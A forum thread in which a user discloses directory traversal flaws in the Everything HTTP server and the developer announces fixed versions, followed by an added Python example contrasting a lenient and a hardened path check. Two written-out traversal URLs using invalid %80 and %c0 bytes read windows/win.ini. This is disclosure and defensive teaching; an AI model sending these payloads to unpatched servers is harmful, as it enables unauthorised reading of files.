Vulnerability on Everything HTTP server (directory traversal)

Silver
Posts: 2
Joined: Tue May 09, 2023 9:11 am

Post by Silver »

Everything version 1.5.0.1345a

A critical vulnerability exists when using the Everything HTTP server.

The web server allows directory traversal. (Web Server Directory Traversal Arbitrary File Access)
Example: [EverythingURL]/%80../%80../%80../%80../%80../%80../windows/win.ini (Access allowed)
void
Developer
Posts: 15659
Joined: Fri Oct 16, 2009 11:31 pm

Re: Vulnerability on Everything HTTP server (directory traversal)

Post by void »

Thank you for the security issue report, Silver,

Everything-1.4.1.1023 and Everything 1.5.0.1346a fix an issue with Everything ignoring the invalid %80 character.
Silver
Posts: 2
Joined: Tue May 09, 2023 9:11 am

Re: Vulnerability on Everything HTTP server (directory traversal)

Post by Silver »

Thank you for the quick response to the request. Unfortunately, this did not completely solve the problem.

It is still possible to get access via other characters. Example:
[EverythingURL]/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./windows/win.ini
void
Developer
Posts: 15659
Joined: Fri Oct 16, 2009 11:31 pm

Re: Vulnerability on Everything HTTP server (directory traversal)

Post by void »

Thank you for the security issue report, Silver,

Everything-1.4.1.1024 and Everything 1.5.0.1347a fix an issue with utf8 => wchar injected relative paths.
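
The class of bug discussed in this thread, as an added example that is not part of the original posts and is not Everything's code: a path check that runs before a lenient UTF-8 conversion, next to a hardened order that decodes strictly first. The `ROOT` value, the function names, the use of `posixpath`, and the modelling of "ignoring invalid bytes" with `errors="ignore"` are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote_to_bytes

ROOT = "/srv/share"  # hypothetical served root, for illustration only


def lenient_resolve(url_path, root=ROOT):
    """Flawed order: '..' is checked on raw bytes, then invalid UTF-8
    bytes are silently dropped (modelled here with errors='ignore')."""
    raw = unquote_to_bytes(url_path)
    if b".." in raw.split(b"/"):
        raise ValueError("traversal segment")
    text = raw.decode("utf-8", errors="ignore")
    return posixpath.normpath(posixpath.join(root, text.lstrip("/")))


def strict_resolve(url_path, root=ROOT):
    """Hardened order: strict decode, validate the decoded segments, then
    confirm the normalized result is still inside the served root."""
    raw = unquote_to_bytes(url_path)
    try:
        text = raw.decode("utf-8", errors="strict")
    except UnicodeDecodeError as exc:
        raise ValueError("invalid UTF-8 in path") from exc
    segments = [s for s in text.split("/") if s]
    for seg in segments:
        if seg in (".", "..") or any(c in seg for c in "\\:\x00"):
            raise ValueError("disallowed path segment")
    full = posixpath.normpath(posixpath.join(root, *segments))
    if posixpath.commonpath([root, full]) != root:
        raise ValueError("path escapes served root")
    return full


if __name__ == "__main__":
    # The two request paths quoted in the thread, plus a constructed benign one.
    samples = [
        "/%80../%80../%80../%80../%80../%80../windows/win.ini",
        "/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./windows/win.ini",
        "/docs/caf%C3%A9.txt",
    ]
    for path in samples:
        try:
            verdict = strict_resolve(path)
        except ValueError as exc:
            verdict = f"rejected ({exc})"
        print(f"lenient={lenient_resolve(path)!r} strict={verdict}")
```

The containment check on the normalized path is what still holds if a future decoder change reintroduces a way to smuggle a `..` segment past the per-segment validation.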